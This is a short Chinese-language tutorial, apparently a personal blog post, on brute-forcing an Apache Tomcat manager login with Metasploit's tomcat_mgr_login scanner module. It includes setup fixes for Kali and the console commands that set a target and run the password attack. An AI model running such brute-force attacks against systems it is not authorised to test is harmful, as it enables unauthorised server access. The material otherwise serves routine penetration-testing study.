查看metasploit中的tomcat腳本
對于tomcat框架的網站,默認tomcat的管理后臺在http://target/manager/html 下。而如果管理員使用弱口令進行登陸的話,則可能通過爆破的方式進行登入。
據說也可以通過burpsuite的方式進行爆破,但是我用burpsuite好像沒能抓到我想要的包,也就沒深究(?),改用metasploit 。
啟動metasploit出現問題
我按照網站上搜索到的metasploit啟動方法進行操作,發現了如上圖所示的問題。繼續搜索發現在kali 2.0版本之后沒有了metasploit服務,所以無法service metaspoit start
。
正確的啟動姿勢如下:
正確啟動metasploit的姿勢
- 第一步不變,啟動postgresql數據庫:/etc/init.d/postgresql start;或者 service postgresql start;
- 初始化MSF數據庫(關鍵步驟!):msfdb init;
- 運行msfconsole:msfconsole;
- 在msf中查看數據庫連接狀態:db_status。
加載輔助模塊
加載輔助模塊
<code>
msf > search tomcat_mgr
msf > use auxiliary/scanner/http/tomcat_mgr_login
</code>
之后可用
show options
命令查看相關可設置項。show options
設置完成之后即可開始爆破
<code>
msf auxiliary(tomcat_mgr_login) > set RHOSTS xxx.xxx.xxx.xx
msf auxiliary(tomcat_mgr_login) > set RPORT 80
msf auxiliary(tomcat_mgr_login) > run
</code>
以上就是基本的操作了。